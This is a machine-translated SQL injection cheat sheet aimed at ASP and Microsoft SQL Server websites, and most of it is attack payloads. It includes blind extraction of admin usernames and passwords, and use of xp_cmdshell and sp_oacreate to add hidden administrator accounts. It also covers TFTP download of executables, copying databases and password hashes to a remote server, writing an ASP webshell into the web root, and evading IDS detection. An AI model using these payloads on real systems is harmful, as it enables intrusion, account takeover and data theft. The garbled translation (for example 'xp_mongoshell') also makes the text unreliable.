Read online materials and learn about Injection

 

 

With the development of B/S application development, more and more programmers are writing programs using this mode.

A large number of applications have security risks. You can submit a piece of database query code based on the results returned by the program.

To obtain the desired data. This is the so-called sqlinjection, that is, SQL injection attacks.

Script Injection attackers insert SQL commands into the input fields of web forms or query strings requested by pages, and cheat the server to execute malicious SQL statements.

Command. In some forms, the content entered by the user is directly used to construct dynamic SQL commands, or as input parameters of the stored procedure.

Obtain the desired password or other information on the server.

Principle

Website configuration content. Once the data in the website is obtained or modified by someone, the individual may gain control over the entire website.

Permission. As for how to obtain the data, those weak MSSQL passwords are not mentioned, and the most likely remaining is the injection vulnerability.

When a user submits a parameter outside the website to go to the database for processing, and then sends the processed result to the user, this is the most common dynamic web page

See, but once this parameter is not filtered, the SQL statements we construct can also be used in database operations together with the parameters.

, Then the SQL injection vulnerability will be generated

It is normal for a website to submit data from other countries. Generally, requests are accepted by parameters and then processed.

Database operations account for a large part. For example

This address contains parameter 1 and the variable Cs that passes this parameter, which means that there is a 1. asp file in the folder and 1. asp file in the folder.

The CS variable is used to accept a parameter submitted externally: 1. It can be other, so in the file 1. asp

General related Code

For example:

............

Cs = request ("ID ")

Sqlsever = "select * Form XX where id = '" & CS &"'"

...............

Use request to read the content of the ID variable, and then perform an SQL query. The statement is select * from xx where id = 1.

Better understanding, but I will use the most classic Injection Vulnerability Detection Method, and add 'After the parameter, the query statement will become

Sqlserver = select * from xx where id = '1', followed by an additional ', the closure problem occurs, if not filtered

Then the system will prompt that it is not closed '.

The principles of and 1 = 1 and 1 = 2 Contributed by Bamboo are the same.

Select * from xx where id = 1 and 1 = 1

Select * from xx where id = 1 and 1 = 2

1 = 1 is true, and 1 = 2 is not true. The query result is: true and false. The final result is incorrect.

Therefore, the first address returns normally, and the second address returns abnormally, so that the system can detect any vulnerability.

The parameter is followed by an SQL statement, for example, an update statement:

Update admin set passwd = 'poruin' where user = 'admin'

The query statement is: Select * from xx where id = 1; and update admin set passwd = 'poruin' where

User = 'admin'

This vulnerability does not affect asp access, asp SQL Server, PHP MySQL, and JSP oracle.

The above is the SQL statement injection, and the DLL injection is actually creating a thread in the target process to load the DLL, without affecting the DLL

.

Common instances

1. determine whether there are any injection points

; And 1 = 1 and 1 = 2

2. Generally, the name of a table is admin adminuser user pass password ..

And 0 <> (select count (*) from *)

And 0 <> (select count (*) from Admin) --- determine whether the admin table exists

3. If the number of accounts is 0, <return correct page 1 <; if the number of accounts is 0, the return error page indicates that the number of accounts is 1.

And 0 <(select count (*) from Admin)

And 1 <(select count (*) from Admin)

4. Add the expected field name to the Len () brackets.

And 1 = (select count (*) from Admin where Len (*)> 0 )--

And 1 = (select count (*) from Admin where Len (User field name)> 0)

And 1 = (select count (*) from Admin where Len (password field name)> 0)

5. Guess the length of each field. The length of each field is changed to 0 until the correct page is returned.

And 1 = (select count (*) from Admin where Len (*)> 0)

And 1 = (select count (*) from Admin where Len (name)> 6) Error

And 1 = (select count (*) from Admin where Len (name)> 5) the correct length is 6

And 1 = (select count (*) from Admin where Len (name) = 6) Correct

And 1 = (select count (*) from Admin where Len (password)> 11) Correct

And 1 = (select count (*) from Admin where Len (password)> 12) the error length is 12

And 1 = (select count (*) from Admin where Len (password) = 12) Correct

6. escape characters

And 1 = (select count (*) from Admin where left (name, 1) = A) --- guesses the first place of the user account

And 1 = (select count (*) from Admin where left (name, 2) = AB) --- second place of the user account

In this way, you can add a character to guess the number of digits you have just guessed. Even if the account has come out

And 1 = (select top 1 count (*) from Admin where ASC (mid (Pass, 5, 1) = 51 )--

This query statement can be used to guess the chinese user and password. You only need to replace the following number with the Chinese assic code, and then convert the result.

Into characters.

Group by users. ID having 1 = 1 --

Group by users. ID, users. username, users. Password, users. privs having 1 = 1 --

; Insert into users values (666, attacker, foobar, 0 xFFFF )--

Union select top 1 column_name from information_schema.columns where table_name = logintable-

Union select top 1 column_name from information_schema.columns where table_name = logintable

Where column_name not in

(Login_id )-

Union select top 1 column_name from information_schema.columns where table_name = logintable

Where column_name not in

(Login_id, login_name )-

Union select top 1 login_name from logintable-

Union select top 1 password from logintable where login_name = Rahul --

Check the server patch = SP4 patch hit

And 1 = (select @ version )--

Check the permissions of the database connection account. The returned result is normal, proving that it is the server role SysAdmin permission.

And 1 = (select is_srvrolemember (SysAdmin ))--

Determine the database account to connect. (Using the SA account for connection returns normal = proves that the connection account is SA)

And SA = (select system_user )--

And user_name () = DBO --

And 0 <> (select user_name ()--

Check whether xp_cmdshell is deleted.

And 1 = (select count (*) from Master. DBO. sysobjects where xtype = x and name = xp_mongoshell )--

Xp_recovery shell is deleted and restored. It supports absolute path recovery.

; Exec master. DBO. sp_addextendedproc xp_mongoshell, xplog70.dll --

; Exec master. DBO. sp_addextendedproc xp_mongoshell, c: \ Inetpub \ wwwroot \ xplog70.dll --

Ping your own lab in reverse order

; Use master; declare @ s int; Exec sp_oacreate "wscript. Shell", @ s out; Exec sp_oamethod

@ S, "run", null, "cmd.exe/c Ping 192.168.0.1 ";--

Add account

; Declare @ shell int exec sp_oacreatewscript.shell, @ shell output exec sp_oamethod

@ Shell, run, null, c: \ winnt \ system32 \ cmd.exe

/C net user jiaoniang $1866574/Add --

Create a virtual directory edisk:

; Declare @ o int exec sp_oacreatewscript.shell, @ o out exec sp_oamethod

@ O,run,null,cscript.exe c: \ Inetpub \ wwwroot \ mkwebdir. vbs-W "Default web site"-V "E", "E :\"--

Access attributes: (write a webshell together)

Declare @ o int exec sp_oacreate wscript. Shell, @ o out exec sp_oamethod

@ O,run,null,cscript.exe c: \ Inetpub \ wwwroot \ chaccess. vbs-A w3svc/1/root/e + browse

Special tips for database explosion: % 5c =\or submit/and \ modify % 5

And 0 <> (select top 1 paths from newtable )--

Obtain the Database Name (from 1 to 5 is the System ID, more than 6 can be determined)

And 1 = (Select name from Master. DBO. sysdatabases where dbid = 7 )--

And 0 <> (select count (*) from Master. DBO. sysdatabases where Name> 1 and dbid = 6)

Submit dbid =, 9... to get more database names.

And 0 <> (select top 1 name from BBS. DBO. sysobjects where xtype = u ).

And 0 <> (select top 1 name from BBS. DBO. sysobjects where xtype = u and name not in (Admin)

Obtain other tables.

And 0 <> (select count (*) from BBS. DBO. sysobjects where xtype = u and name = Admin

And uid> (STR (ID) the value of the brute-force uid is assumed to be 18779569 uid = ID

And 0 <> (select top 1 name from BBS. DBO. syscolumns where id = 18779569)

Segment, which is assumed to be user_id

And 0 <> (select top 1 name from BBS. DBO. syscolumns where id = 18779569 and name not in

(ID,...) to expose other fields

And 0 <(select user_id from BBS. DBO. Admin where username> 1) to get the user name

The password can be obtained in sequence. Assume that fields such as user_id username and password exist.

And 0 <> (select count (*) from Master. DBO. sysdatabases where Name> 1 and dbid = 6)

And 0 <> (select top 1 name from BBS. DBO. sysobjects where xtype = U)

And 0 <> (select top 1 name from BBS. DBO. sysobjects where xtype = u and name not in (Address ))

And 0 <> (select count (*) from BBS. DBO. sysobjects where xtype = u and name = admin and uid> (Str

(ID) determine the id value

And 0 <> (select top 1 name from BBS. DBO. syscolumns where id = 773577794) All fields

? Id =-1 Union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, * from Admin

? Id =-1 Union select 1, 2, 4, 5, 6, 7, 8, *, 9, 10, 11, 12, 13 from Admin (Union, access is also useful)

Obtain the web path

; Create Table [DBO]. [swap] ([swappass] [char] (255 ));--

And (select top 1 swappass from SWAp) = 1 --

; Create Table newtable (ID int identity (500), paths varchar () Declare @ test varchar (

20) exec master .. xp_regread

@ Rootkey = HKEY_LOCAL_MACHINE, @ key = System \ CurrentControlSet \ Services \ W3SVC \ Parameters \ virtual

Roots \, @ value_name = /,

[Email protected] insert into paths (PATH) values (@ test )--

; Use ku1 ;--

; Create Table cmd (STR image); -- create an image-type table cmd

Test procedure with xp_cmdshell:

; Exec master .. xp_mongoshell dir

; Exec master. DBO. sp_addlogin jiaoniang $; -- add an SQL account

; Exec master. DBO. sp_password null, jiaoniang $, 1866574 ;--

; Exec master. DBO. SP_ADDSRVROLEMEMBER jiaoniang $ SysAdmin ;--

; Exec master. DBO. xp_mongoshell net user jiaoniang $1866574/workstations: */times: All

/Passwordchg: yes/passwordreq: Yes

/Active: yes/Add ;--

; Exec master. DBO. xp_mongoshell net localgroup administrators jiaoniang $/Add ;--

Exec master .. xp_servicecontrol start, schedule start service

Exec master .. xp_servicecontrol start, Server

; Declare @ shell int exec sp_oacreate wscript. Shell, @ shell output exec sp_oamethod

@ Shell, run, null, c: \ winnt \ System32

\ Cmd.exe/C net user jiaoniang $1866574/Add

; Declare @ shell int exec sp_oacreate wscript. Shell, @ shell output exec sp_oamethod

@ Shell, run, null, c: \ winnt \ system32 \ cmd.exe

/C net localgroup administrators jiaoniang $/Add

Exec master.. xp_cmdshell TFTP-I youip get file.exe -- use TFTP to upload files

; Declare @ A sysname set @ A = XP _ + export shell exec @ A dir c :\

; Declare @ A sysname set @ A = XP + _ cm '+ 'dshell exec @ A dir c :\

; Declare @ A; Set @ A = db_name (); backup database @ A to disk = your IP address your shared directory Bak. dat

If it is restricted, you can.

Select * From OpenRowSet (sqloledb, server; SA;, select OK! Exec master. DBO. sp_addlogin Hax)

Query structure:

Select * from news where id =... and topic =... and .....

Adminand 1 = (select count (*) from [user] Where username = victim and right (left

(Userpass, 01), 1) = 1) and userpass <>

Select 123 ;--

; Use master ;--

: A or name like fff %; -- displays a user named FFFF.

And 1 <> (select count (email) from [user]); --

; Update [users] Set email = (select top 1 name from sysobjects where xtype = u and status> 0)

Where name = FFFF ;--

; Update [users] Set email = (select top 1 ID from sysobjects where xtype = u and name = AD)

Where name = FFFF ;--

; Update [users] Set email = (select top 1 name from sysobjects where xtype = u and

ID & gt; 581577110) Where name = FFFF ;--

; Update [users] Set email = (select top 1 count (ID) from password) Where name = FFFF ;--

; Update [users] Set email = (select top 1 PWD from password where id = 2) Where name = FFFF ;--

; Update [users] Set email = (select top 1 name from password where id = 2) Where name = FFFF ;--

The preceding statement is used to obtain the first user table in the database and put the table name in the FFFF user's mailbox field.

By viewing FFFF user information, you can obtain the first table named ad.

Then, the ID of the table is obtained based on the table name ad. The name of the second table is obtained.

Insert into users values (666, char (0x63) + char (0x68) + char (0x72) + char (0x69) + char

(0x73), char (0x63) + char (0x68) + char (0x72) + char

(0x69) + char (0x73), 0 xFFFF )--

Insert into users values (667,123,123, 0 xFFFF )--

Insert into users values (123, admin --, password, 0 xFFFF )--

; And user> 0

; And (select count (*) from sysobjects)> 0

; And (select count (*) from mysysobjects)> 0 // Access Database

Name of a data table

; Update AAA set AAA = (select top 1 name from sysobjects where xtype = u and status> 0 );--

This is to update the first table name to the AAA field.

Read the first table. The second table can be read in this way (ADD and name <> after the condition; the name of the table just obtained ).

; Update AAA set AAA = (select top 1 name from sysobjects where xtype = u and status> 0 and

Name <> vote );--

Then Id = 1552 and exists (select * from AAA where AAA> 5)

Read the second table one by one until no.

The read field is as follows:

; Update AAA set AAA = (select top 1 col_name (object_id (table name), 1 ));--

Then Id = 152 and exists (select * from AAA where AAA> 5) error.

; Update AAA set AAA = (select top 1 col_name (object_id (table name), 2 ));--

Then Id = 152 and exists (select * from AAA where AAA> 5) error.

[Retrieve data table name] [update the field value to the table name, and read the value of this field to get the table name]

Update table name set field = (select top 1 name from sysobjects where xtype = u and status> 0 [and

Name <>; the name of the table you obtain is added])

[Where condition] Select top 1 name from sysobjects where xtype = u and status> 0 and name not in

(Table1, Table2 ,...)

Create a database administrator account and a system administrator account through sqlserver injection vulnerability [the current account must be a SysAdmin Group]

[Obtain the field name of a data table] [update the field value to the field name, and then read the value of this field to obtain the field name]

Update table name set field = (select top 1 col_name (object_id (name of the data table to be queried), field column for example: 1 )[

Where condition]

Bypassing IDS detection [using variables]

; Declare @ A sysname set @ A = XP _ + export shell exec @ A dir c :\

; Declare @ A sysname set @ A = XP + _ cm '+ 'dshell exec @ A dir c :\

Enable remote database

Basic syntax

Select * From OpenRowSet (sqloledb, Server = servername; uid = sa; Pwd = 123, select * From Table1)

Parameter: (1) oledb provider name

The connection string parameter can be any port used for connection, for example

Select * From OpenRowSet

(Sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * from table

Copy all remote tables from the entire database of the target host to the local table.

Basic Syntax:

Insert into OpenRowSet (sqloledb, Server = servername; uid = sa; Pwd = 123, select * From Table1)

Select * From Table2

This line of statements copies all the data in table 2 on the target host to table 1 in the remote database. Modify it in practical use

The IP address and port of the connection string, pointing to the desired location, for example:

Insert into OpenRowSet

(Sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * From Table1)

Select * from

Table 2

Insert into OpenRowSet

(Sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * from

_ Sysdatabases)

Select * from Master. DBO. sysdatabases

Insert into OpenRowSet

(Sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * from

_ Sysobjects)

Select * From user_database.dbo.sysobjects

Insert into OpenRowSet

(Sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * from

_ Syscolumns)

Select * From user_database.dbo.syscolumns

Copy a database:

Insert into OpenRowSet

(Sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * From Table1)

Select * from database .. Table1 insert into OpenRowSet

(Sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * From table2)

Select * fromdatabase... Table2

Copy and store the hash of the hash password in sysxlogins. The method is as follows:

Insert into OpenRowSet

(Sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * from

_ Sysxlogins) Select

* From database. DBO. sysxlogins

After obtaining the hash, you can perform brute-force cracking.

To traverse the directory, create a temporary table: temp.

; Create Table temp (ID nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3

Nvarchar (255 ));--

; Insert temp exec master. DBO. xp_availablemedia; -- get all current drives

; Insert into temp (ID) exec master. DBO. xp_subdirs C :\; -- get the subdirectory list

; Insert into temp (ID, num1) exec master. DBO. xp_dirtree c: \; -- get the directory tree structure of all subdirectories,

And inch into the temp table

; Insert into temp (ID) exec master. DBO. xp_shareshell Type C: \ WEB \ index. asp; -- view

Content

; Insert into temp (ID) exec master. DBO. xp_shareshell dir c :\;--

; Insert into temp (ID) exec master. DBO. xp_shareshell dir c: \ *. asp/S/;--

; Insert into temp (ID) exec master. DBO. xp_cmdshell cscript. c: \ Inetpub \ adminscripts

\ Adsutil. vbs Enum w3svc

; Insert into temp (ID, num1) exec master. DBO. xp_dirtree c: \; -- (xp_dirtree applies to public)

Write table:

Statement 1: And 1 = (select is_srvrolemember (SysAdmin ));--

Statement 2: And 1 = (select is_srvrolemember (serveradmin ));--

Statement 3: And 1 = (select is_srvrolemember (setupadmin ));--

Statement 4: and 1 = (select is_srvrolemember (securityadmin ));--

Statement 5: and 1 = (select is_srvrolemember (securityadmin ));--

Statement 6: and 1 = (select is_srvrolemember (diskadmin ));--

Statement 7: and 1 = (select is_srvrolemember (bulkadmin ));--

Statement 8: and 1 = (select is_srvrolemember (bulkadmin ));--

Statement 9: and 1 = (select is_member (db_owner ));--

Write the path to the table:

; Create Table dirs (paths varchar (100), Id INT )--

; Insert dirs exec master. DBO. xp_dirtree c :\--

And 0 <> (select top 1 paths from dirs )--

And 0 <> (select top 1 paths from dirs where paths not in (@ inetpub ))--

; Create Table dirs1 (paths varchar (100), Id INT )--

; Insert dirs exec master. DBO. xp_dirtree E: \ Web --

And 0 <> (select top 1 paths from dirs1 )--

Back up the database to the web directory: Download

; Declare @ A sysname; Set @ A = db_name (); backup database @ A to disk = E: \ WEB \ down. bak ;--

And 1 = (select top 1 name from (select Top 12 ID, name from sysobjects where xtype = char (85 ))

T order by id desc)

And 1 = (select top 1 col_name (object_id (user_login), 1) from sysobjects) See related tables.

And 1 = (select user_id from user_login)

And 0 = (Select User From user_login where user> 1)

-=-Wscript. shellexample-=-

Declare @ o int

Exec sp_oacreate wscript. Shell, @ o out

Exec sp_oamethod @o,run,null,notepad.exe

; Declare @ o int exec sp_oacreate wscript. Shell, @ o out exec sp_oamethod

@ O,run,null,notepad.exe --

Declare @ o int, @ F int, @ t int, @ RET int

Declare @ line varchar (8000)

Exec sp_oacreate scripting. FileSystemObject, @ o out

Exec sp_oamethod @ o, opentextfile, @ F out, c: \ Boot. ini, 1

Exec @ ret = sp_oamethod @ F, Readline, @ line out

While (@ ret = 0)

Begin

Print @ line

Exec @ ret = sp_oamethod @ F, Readline, @ line out

End

Declare @ o int, @ F int, @ t int, @ RET int

Exec sp_oacreate scripting. FileSystemObject, @ o out

Exec sp_oamethod @ o, createtextfile, @ F out, c: \ Inetpub \ wwwroot \ Foo. asp, 1

Exec @ ret = sp_oamethod @ F, writeline, null,

<% Set O = server. Createobject ("wscript. Shell"): O. Run (request. querystring ("cmd") %>

Declare @ o int, @ RET int

Exec sp_oacreate speech. voicetext, @ o out

Exec sp_oamethod @ o, register, null, Foo, bar

Exec sp_oasetproperty @ o, speed, 150

Exec sp_oamethod @ o, speak, null, all your sequel servers are belong to, US, 528 waitfor Delay

00:00:05

; Declare @ o int, @ RET int exec sp_oacreate speech. voicetext, @ o out exec sp_oamethod

@ O, register, null, Foo, bar Exec

Sp_oasetproperty @ o, speed, 150 exec sp_oamethod @ o, speak, null, all your sequel servers are

Belong to us, 528 waitfor delay 00:00:05 --

Public permission for xp_dirtree

Exec master. DBO. xp_dirtree c :\

The returned information includes two fields subdirectory and depth. The subdirectory field is the accept type, and the depth field is the integer field.

Create Table dirs (paths varchar (100), Id INT)

Create a table. The table created here is connected to the preceding xp_dirtree. The fields are equal and the types are the same.

Insert dirs exec master. DBO. xp_dirtree c :\

As long as the table creation definition is equal to the field returned by the storage process, it can be executed! To write tables.